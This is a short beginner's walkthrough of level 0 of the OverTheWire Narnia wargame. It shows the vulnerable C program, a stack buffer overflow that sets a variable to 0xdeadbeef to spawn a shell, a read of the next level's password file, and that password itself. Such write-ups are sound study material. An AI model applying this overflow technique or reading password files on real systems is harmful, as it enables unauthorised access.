Learning Pwn using Over The Wire Narnia
Narnia is a kind of game to learn basic exploitation.
Each stage includes vulnerabilities to be easy to exploit.
We can easily find bugs and make the exploitation plan because we can see C source code at narnia server.
Level0
First I connected to Narnia server using SSH.
And entered narnia0's password.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance:
It seems like a problem to overrite variable val. and then I checked the C sourec code.
#include <stdio.h>;
#include <stdlib.h>;
int main(){
long val=0x41414141;
char buf[20];
printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
printf("Here is your chance: ");
scanf("%24s",&buf);
printf("buf: %s\n",buf);
printf("val: 0x%08x\n",val);
if(val==0xdeadbeef){
setreuid(geteuid(),geteuid());
system("/bin/sh");
}
else {
printf("WAY OFF!!!!\n");
exit(1);
}
return 0;
}
Initial value of val is 0x414141.
If I can set val to 0xdeadbeef, I can get shell.
Variable buf is available because it has a buffer-overflow vulnerability.
To write 24 bytes into stack area of buf will make overriting value of val.
In order to write binary code 0xdeadbeef, I used python.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaᆳ�
val: 0xdeadbeef
I could successfuly set val to 0xdeadbeef, but shell terminated immidiatry.
I tried it again with cat command not to terminate shell.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ�
val: 0xdeadbeef
cat /etc/narnia_pass/narnia1
efeidiedae
I could get narnia1's password from /etc/narnia_pass/narnia1.